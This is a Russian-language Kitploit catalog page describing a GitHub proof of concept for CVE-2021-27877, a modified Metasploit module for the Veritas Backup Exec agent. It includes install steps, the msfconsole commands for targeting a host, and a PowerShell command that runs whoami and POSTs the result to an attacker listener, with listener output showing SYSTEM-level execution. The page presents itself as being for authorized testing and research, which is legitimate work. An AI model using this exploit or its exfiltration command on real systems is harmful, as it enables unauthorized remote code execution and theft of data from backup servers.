Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-27877-PoC — Модифицированная версия модуля Rapid7 Metasploit для CVE-2021-27877, которая поддерживает прямое выполнение команд для надёжной проверки уязвимости. Включает документацию, объясняющую порядок эксплуатации, изменения модуля и примеры использования. | Kitploit
Инструменты/GitHubGitHub/yashswarup12/cve-2021-27877-poc
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubyashswarup12/cve-2021-27877-poc

CVE-2021-27877-PoC

Модифицированная версия модуля Rapid7 Metasploit для CVE-2021-27877, которая поддерживает прямое выполнение команд для надёжной проверки уязвимости. Включает документацию, объясняющую порядок эксплуатации, изменения модуля и примеры использования.

Репозиторий
22 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-27877 Доказательство концепции

Этот репозиторий содержит модифицированную версию оригинального модуля Rapid7 Metasploit для CVE-2021-27877, затрагивающего агент Veritas Backup Exec.

В ходе моего тестирования оригинальный модуль Metasploit успешно определял цель как уязвимую, но постоянно не мог установить сессию, так как этап доставки полезной нагрузки был неудачным. Однако анализ модуля показал, что аутентификация и базовая функциональность выполнения команд работали корректно.

Чтобы упростить проверку уязвимости, я модифицировал модуль для непосредственного выполнения пользовательских команд операционной системы через уязвимую функциональность выполнения команд NDMP вместо загрузки и выполнения полезной нагрузки. Это упрощает подтверждение удаленного выполнения кода без необходимости в обратной оболочке или промежуточной полезной нагрузке.

Отказ от ответственности: Это доказательство концепции предоставлено только в образовательных целях и для авторизованного тестирования безопасности. Используйте его только против систем, которыми вы владеете или на которые имеете явное разрешение для тестирования.

Примечание: Для защиты среды, использовавшейся во время тестирования, все IP-адреса в этом репозитории анонимизированы. Во всех примерах 192.168.x.x обозначает целевую систему, а 192.168.y.y — атакующую систему или слушатель. Эти замены не влияют на функциональность доказательства концепции.


Изменения

По сравнению с оригинальным модулем Rapid7 были внесены следующие изменения:

  • Добавлена новая опция времени выполнения .
COMMAND
  • Удалена зависимость от загрузки полезной нагрузки.
  • Выполняется одна команда, указанная пользователем.
  • Не предпринимается попытка установить сессию Meterpreter.

  • Установка

    Скопируйте модифицированный модуль в ваш локальный каталог модулей Metasploit.

    root@kitploit:~
    cp beagent_sha_auth_rce_custom.rb /usr/share/metasploit-framework/modules/exploits/multi/veritas/
    

    Запустите (или перезапустите) Metasploit и перезагрузите локальные модули:

    root@kitploit:~
    msfconsole
    reload_all
    

    Использование

    Перед запуском модуля запустите HTTP-слушатель (или любой веб-сервер, способный принимать и отображать HTTP-запросы POST). Этот слушатель будет получать вывод команды, выполненной на цели.

    Например, вы можете использовать простой Python HTTP-сервер с пользовательским обработчиком запросов, nc или любой другой HTTP-слушатель по вашему выбору.

    Загрузите модуль:

    root@kitploit:~
    use exploit/multi/veritas/beagent_sha_auth_rce_custom
    

    Настройте необходимые опции:

    root@kitploit:~
    set RHOSTS 192.168.x.x
    set RPORT 10000
    
    set COMMAND powershell -Command "$output = whoami; Invoke-WebRequest -Uri 'http://192.168.y.y:8080/' -Method POST -Body $output"
    
    run
    

    Опция COMMAND принимает любую команду, которую вы хотите выполнить на цели.


    Получение вывода команды

    Этот модуль предназначен для выполнения одной команды и не возвращает вывод команды автоматически.

    Чтобы получить вывод, используйте подходящий механизм обратного вызова в вашей команде (например, HTTP-запрос POST или другой исходящий канал) и отслеживайте его с помощью вашего слушателя.

    Пример вывода слушателя:

    root@kitploit:~
    Listening on 0.0.0.0 8080
    Connection received on 192.168.x.x 26006
    POST / HTTP/ 1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShe11/5.1.14393.9234
    Content-Type: application/x-www-form-urlencoded
    Host: 192.168.y.y:8080
    Content-Length: 19
    Expect: 100-continue
    Connection: Keep-Alive
    
    nt authority\system
    

    Ссылки

    • Модуль Rapid7 Metasploit
    • Бюллетень безопасности Veritas (VTS21-001)
    • Статья на Medium

    Благодарности

    • Оригинальный модуль Metasploit: Rapid7
    • Модификации: Yash Swarup
    Скачать инструмент